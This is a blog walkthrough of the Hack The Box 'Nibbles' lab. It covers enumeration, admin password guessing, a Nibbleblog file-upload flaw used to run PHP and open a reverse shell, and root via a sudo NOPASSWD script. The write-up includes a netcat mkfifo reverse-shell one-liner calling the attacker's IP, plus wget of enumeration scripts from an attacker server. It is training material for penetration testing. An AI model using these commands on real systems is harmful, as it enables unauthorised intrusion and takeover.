First we grab the .ovpn<\/em> file for the VPN and connect to the network from our machine: openvpn rofo.ovpn. <\/em>An initial nmap of the IP is next.<\/p>\n\n\n\n nmap -sV \u2013open -oA initial_scan 10.10.10.75<\/span><\/p>\n\n\n\n The result shows us we have 2 open ports of interest: 22\/tcp ssh (OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0), and port 80\/tcp open http (Apache httpd 2.4.18 ((Ubuntu)). Looks like we’re dealing with a web server – plenty of potential attack vectors. We’ll get some further information on the two ports with some banner grabbing with netcat<\/em>.<\/p>\n\n\n\n Nothing extra of note exposed here. Next we run a more detailed nmap script scan (-sC) of the two discovered ports for any further information we can pull.<\/p>\n\n\n\n nmap -sC -p 22,80 -oA script_scan 10.10.10.75<\/span><\/p>\n\n\n\n This gives us the ssh-hostkey <\/em>but nothing extra, so we’ll run a nmap<\/em> enumeration using the http-enum<\/em> script:<\/p>\n\n\n\n nmap -sV –script=http-enum -oA http_enum_script 10.10.10.75<\/span><\/p>\n\n\n\n This takes a very long time – so we’ll leave it running in a background terminal for now and move on. In the meantime we’ll start digging deeper into the web server. Running a whatweb<\/em> command on the target to further identify the server confirms it’s an Apache HTTPServer running on Ubuntu Linux.<\/p>\n\n\n\n Next we’ll gobuster <\/em>the target with the common.txt<\/em> wordlist to enumerate web folders and status codes to see where we can start poking around in curl<\/em> or a browser. To download the wordlist from their repository:<\/p>\n\n\n\n wget https:\/\/raw.githubusercontent.com\/danielmiessler\/SecLists\/master\/Discovery\/Web-Content\/common.txt<\/span><\/p>\n\n\n\n Followed by our gobuster command to begin:<\/p>\n\n\n\n gobuster dir -u 10.10.10.75:80 -w common.txt<\/span><\/p>\n\n\n\n First obvious step is to visit the servers homepage. A quick check of the network and source reveals an obvious next step, a nibbleblog<\/em> reference in the index.html<\/em> source code. <\/p>\n\n\n\n No idea what Nibbleblog is so I’ll do some quick research as well as a whatweb<\/em> of the \/nibbleblog\/ <\/em>directory mentioned above. HTML5, JQuery, Powered by [Nibbleblog], with a site title. <\/p>\n\n\n\n It’s a free blog system. Browsing the blog quickly yields nothing – no posts, empty categories, etc. That leads us to any potential exploit research, which leads us to Metasploit supported exploit CVE-2015-6967 – File Upload Vulnerability<\/span>. This allows an authenticated remote attacker to execute arbitrary PHP code – tested on version 4.0.3. So one of the file upload plugins or blog functionality lets us upload a little more than what’s intended.<\/p>\n\n\n\n We’ll gobuster<\/em> the Nibbleblog site next to get an overview of the structure of the site. Here I could also have looked to download and install a Nibbleblog on my own web server locally, to browse the locations of config<\/em> files, important directories, etc. also.<\/p>\n\n\n\n gobuster dir -u 10.10.10.75:80 -w \/usr\/share\/dirb\/wordlists\/common.txt<\/span><\/p>\n\n\n\n This returns a number of status 200 responses that I can browse \u2013 primarily an admin.php<\/em> and a README<\/em> file. Let’s check out the README file, which confirms this is likely v4.0.3 of Nibbleblog, the one with the Metasploit exploit above. We also get some information we can follow up down the road about PHP versioning, required PHP modules and permissions.<\/p>\n\n\n\n Start browsing the entirety of the Nibbleblog platform now. We’ll go to admin.php<\/em>, functions.js<\/em> \u2013 there’s nothing in source, nothing in network or cookies when I try to login. A few generic username and password combinations don’t work, and I find no information on any default credentials. Attempting to reset the password of an email gives an error message, so perhaps some broken functionality there can provide another avenue. After too many attempts to login I get blacklisted \u2013 so cannot brute force the web server. Will have to go by a timer or find a way to access a hash or workaround.<\/p>\n\n\n\n We check out all the redirect folders for Nibbleblog \u2013 part of the installation: \/admin\/<\/em>, \/content\/<\/em>, \/languages\/<\/em>, \/plugins\/<\/em>, \/themes\/<\/em>. Absolutely all of these have directory listing enabled so there’s a lot to potentially explore and take advantage of. There has to be something here showing credentials, particularly in admin. The users file under \/content<\/em> shows us the \u2018admin\u2019 user \u2013 no password found. We check keys.php<\/em> and shadow.php<\/em> under content but not getting anything..<\/p>\n\n\n\n There are a lot of user controller .bit<\/em> files in admin \u2013 nothing however with a potential password or anything obviously valuable. Controllers under the \/admin<\/em> folder contains a lot of pointers to the shadow.php<\/em> file for user authentication and control. We try admin\/kernel\/db\/db_users.class.php<\/em> – no response.<\/p>\n\n\n\n In the plugin my_image<\/em> there is a db.xml<\/em> and image.php<\/em>. A .php <\/em>extension for an image is odd, unless it\u2019s a controller. I have my eye out for anything upload related due to the Metasploit detailed previously – which I’m yet to follow up on until I’ve finished enumeration.<\/p>\n\n\n\n Gaining Access & Server Foothold<\/strong><\/p>\n\n\n\n I’m next going to attempt to brute login between spam password attempt blacklists. The machine has reset since my last session so I have a new IP, however if this did not happen I’d use a proxy or VPN to attempt logins to the site from different IP’s. I create a short wordlist based on the site, company, domain, theme names, platform, etc. so I have words like ‘blog’, ‘shadow’, ‘nibbles’, ‘controller’<\/em>, etc. ‘nibbles<\/em>‘ gets us in with the final credentials of admin:nibbles<\/em>. This has us in the administrator dashboard.<\/p>\n\n\n\n We have the authentication credentials – which means if necessary we can use the original Metasploit exploit found for this version of Nibblesblog – CVE-2015-6967<\/span>. For now, we’ll start poking around the areas we’ll have access to as administrator; and since we’re running on PHP, we’ll see if we can inject PHP code anywhere with a quick .php<\/em> file\/code.<\/p>\n\n\n\n The code is also pasted in a new blog post to check if it runs as PHP in the pages or it’s parsed to a string. We make sure we have code editor selected rather than any visual editor. We can see in the ‘source code’ view and blog post itself that the platform prevents PHP from being run directly. Checking out the settings – turning on ‘Advanced options for post’ to see if that makes any difference – none. There’s nothing else that stands out in the settings, but the platform version is confirmed a second time as at the bottom of the settings shows: ‘Nibbleblog 4.0.3. “Coffee”.<\/p>\n\n\n\n After exploring the plugins we know that there is one for uploading\/setting an image. This brings back to mind the Metasploit identified as a file upload functionality. The ability to upload files to the server is a strong avenue of attack if the files aren’t checked properly, ie. an image upload method that doesn’t check if the files uploaded are actually <\/em>images. Because we have access to many of the sites folders with misconfigured directory listing, we can also likely find where the files we upload are stored.<\/p>\n\n\n\n Within the image plugin, we try to upload our rofotest<\/em>.php<\/em> file to test the strategy, keeping the title and caption of the image as default (keeping in mind we’ll try the code here down the road also if necessary). If we can get a .php <\/em>file on the site we can start running our custom PHP code directly on the server, and from there we can try pull more information or run a shell. <\/p>\n\n\n\n The upload seems to go through but there’s a lot of error output – let’s check the server directories again anyway and see if our file is there. <\/p>\n\n\n\n There is no new image file, but opening the image.php<\/em> file in the image plugin directory now shows us our PHP code that we recently uploaded. It tells us that the current user of the system is nibbler<\/em>. So the image.php<\/em> file is simply the result of whatever we upload in the image plugin. The next step is to repeat the process and try to establish a reverse shell back to my machine from the server.<\/p>\n\n\n\n Shell Access<\/strong><\/p>\n\n\n\n Preparing for a shell command, we prepare a remote shell listener on our local machine..<\/p>\n\n\n\n ..and pull a reverse shell PHP code snippet from somewhere like GTFOBins <\/em>or PayloadAllTheThings<\/em>, updating our .php <\/em>file to execute the shell command when the page is reloaded.<\/p>\n\n\n\n We reload the image.php <\/em>file on the server once the above has been re-uploaded, and it works. Our local listener picks up on the connection attempt, and we now have a reverse shell established. <\/p>\n\n\n\n We have a reverse shell established \u2013 so what are our next steps? First we\u2019ll try and upgrade the reverse shell to an interactive TTY to make things smoother. Python doesn\u2019t work, but a which python <\/em>command tells us that python3 is on the machine, so we try the following command. We now have an upgraded shell.<\/p>\n\n\n\n python3 -c ‘import pty; pty.spawn(“\/bin\/bash”)’<\/span><\/p>\n\n\n\n A whoami command confirms we are the user nibbler<\/em>. Our nibbler user gives us the user.txt <\/em>solution flag with a simple vim<\/em>. We poke around the \/home<\/em> folder, the \/etc<\/em> folder, start getting an overview of every folder we have access to and look for anything of value. There’s a personal.zip<\/em> file in the user directory that we’re going to want to check out. Unzipping it gives us only a single file two directories down \/personal\/stuff\/monitor.sh <\/em>which we view for anything of value.<\/p>\n\n\n\n A sudo -l<\/em> shows us that nibbler can run this monitor.sh script as root with NOPASSWD \u2013 so it’s likely this is an in with privilege escalation to the root<\/em> user. The #! \/bin\/bash<\/em> comment tells us it uses bash \u2013 this must be it – we can run bash scripts here with root privileges.<\/p>\n\n\n\n Privilege Escalation<\/strong><\/p>\n\n\n\n To expand on what we’ve found so far we’ll try to pull and run two common Linux enumeration scripts LinEnum<\/em> and linuxprivchecker<\/em>. We need to get these scripts on the target machine, so we\u2019ll http them in with a temporary HTTP server we establish on our machine:<\/p>\n\n\n\n sudo python -m http.server 8080<\/span><\/p>\n\n\n\n From this http.server<\/em> we can wget <\/em>from our target machine the files we need. First I had to download LinEnum.sh<\/em>, then we get it from the target machine to our local HTTP server (10.10.14.3:8080) with wget http:\/\/10.10.14.3:8080\/LinEnum.sh<\/em>. chmod +x LinEnum.sh<\/em> once received to make it executable on our target machine, then .\/LinEnum.sh<\/em> to begin the scan. See below:<\/p>\n\n\n\n The LinEnum.sh<\/em> scan confirms what we learnt with sudo -l<\/em> earlier \u2013 we can run the monitor.sh<\/em> file from the unzipped folder location as nibbler <\/em>with root <\/em>privileges. If we can run a shell from this file with privileged access as sudo with no password, we can create a new shell as root with full privileges rather than as the user nibbler.<\/p>\n\n\n\n So, the next step is to append a second shell to the monitor.sh<\/em> file which we are running with root privileges thanks to the NOPASSWD requirement. The smoothest way to append a shell command to a file without messing around in an unreliable vim or basic shell is to use the command. It did take a couple of tries with a few other commands as the environment wasn’t acting too kindly to me at this point, but eventually we amended the file without breaking anything.<\/p>\n\n\n\n echo ‘rm \/tmp\/f;mkfifo \/tmp\/f;cat \/tmp\/f|\/bin\/sh -i 2>&1|nc 10.10.14.3 1234 >\/tmp\/f’ >> monitor.sh<\/span><\/p>\n\n\n\n This attaches a line to the monitor.sh file running a bash command for a new reverse shell to our new reverse shell listener on port 1234 (or a different port if there’s an issue with first listener) with presumably root privileges. <\/p>\n\n\n\n Make sure you’re in the directory containing the file \/home\/nibbler\/personal\/stuff<\/em>. We can check this is appended with cat monitor.sh <\/em>and see the extra command attached. Running this monitor.sh<\/em> as root with no password requirement will connect the reverse shell as root – giving us access without requiring a password.<\/p>\n\n\n\n sudo \/home\/nibbler\/personal\/stuff\/monitor.sh.<\/span><\/p>\n\n\n\n If you mess up, you can remove the last line from a file with the command: <\/p>\n\n\n\n sed -i ‘$ d’ monitor.sh<\/span><\/p>\n\n\n\n And our listener picks up the successful request. Another whoami<\/em> on this reverse shell and we confirm that we are not in the machine as the root user. A couple of ls <\/em>later and cd \/root ls<\/em> takes us to the final system solution flag file: root.txt<\/em>.<\/p>\n\n\n\n <\/p>\n","protected":false},"excerpt":{"rendered":" Nibbles is rated as an easy machine on HTB. Enumeration First we grab the .ovpn file for the VPN and connect to the network from our machine: openvpn rofo.ovpn. An initial nmap of the IP is next. nmap -sV \u2013open -oA initial_scan 10.10.10.75 The result shows us we have 2 open ports of interest: 22\/tcp […]<\/p>\n","protected":false},"author":1,"featured_media":449,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[8,9],"tags":[],"class_list":["post-104","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cybersecurity","category-hack-the-box"],"yoast_head":"\n![\"\"](\"https:\/\/jasonlcurby.com\/blog\/wp-content\/uploads\/2022\/06\/nibbles-walkthrough-1.jpg\")
![\"Netcat](\"https:\/\/jasonlcurby.com\/blog\/wp-content\/uploads\/2022\/06\/nibbles-walkthrough-2.jpg\")
![\"\"](\"https:\/\/jasonlcurby.com\/blog\/wp-content\/uploads\/2022\/06\/nibbles-walkthrough-3.jpg\")
![\"\"](\"https:\/\/jasonlcurby.com\/blog\/wp-content\/uploads\/2022\/06\/nibbles-walkthrough-4.jpg\")
![\"\"](\"https:\/\/jasonlcurby.com\/blog\/wp-content\/uploads\/2022\/06\/nibbles-walkthrough-5.jpg\")
![\"\"](\"https:\/\/jasonlcurby.com\/blog\/wp-content\/uploads\/2022\/06\/nibbles-walkthrough-6.jpg\")
![\"\"](\"https:\/\/jasonlcurby.com\/blog\/wp-content\/uploads\/2022\/06\/nibbles-walkthrough-7.jpg\")
![\"\"](\"https:\/\/jasonlcurby.com\/blog\/wp-content\/uploads\/2022\/06\/nibbles-walkthrough-9.jpg\")
![\"\"](\"https:\/\/jasonlcurby.com\/blog\/wp-content\/uploads\/2022\/06\/nibbles-walkthrough-11.jpg\")
![\"\"](\"https:\/\/jasonlcurby.com\/blog\/wp-content\/uploads\/2022\/06\/nibbles-walkthrough-12-1024x522.jpg\")
![\"\"](\"https:\/\/jasonlcurby.com\/blog\/wp-content\/uploads\/2022\/06\/nibbles-walkthrough-13.jpg\")
![\"\"](\"https:\/\/jasonlcurby.com\/blog\/wp-content\/uploads\/2022\/06\/nibbles-walkthrough-14-1024x309.jpg\")
![\"\"](\"https:\/\/jasonlcurby.com\/blog\/wp-content\/uploads\/2022\/06\/nibbles-walkthrough-15.jpg\")
![\"\"](\"https:\/\/jasonlcurby.com\/blog\/wp-content\/uploads\/2022\/06\/nibbles-walkthrough-16.jpg\")
![\"\"](\"https:\/\/jasonlcurby.com\/blog\/wp-content\/uploads\/2022\/06\/nibbles-walkthrough-17.jpg\")
![\"\"](\"https:\/\/jasonlcurby.com\/blog\/wp-content\/uploads\/2022\/06\/nibbles-walkthrough-18.jpg\")
![\"\"](\"https:\/\/jasonlcurby.com\/blog\/wp-content\/uploads\/2022\/06\/nibbles-walkthrough-19.jpg\")
![\"\"](\"https:\/\/jasonlcurby.com\/blog\/wp-content\/uploads\/2022\/06\/nibbles-walkthrough-20.jpg\")
![\"\"](\"https:\/\/jasonlcurby.com\/blog\/wp-content\/uploads\/2022\/06\/nibbles-walkthrough-21.jpg\")
![\"\"](\"https:\/\/jasonlcurby.com\/blog\/wp-content\/uploads\/2022\/06\/nibbles-walkthrough-22.jpg\")
![\"\"](\"https:\/\/jasonlcurby.com\/blog\/wp-content\/uploads\/2022\/06\/nibbles-walkthrough-23.jpg\")
![\"\"](\"https:\/\/jasonlcurby.com\/blog\/wp-content\/uploads\/2022\/06\/nibbles-walkthrough-24.jpg\")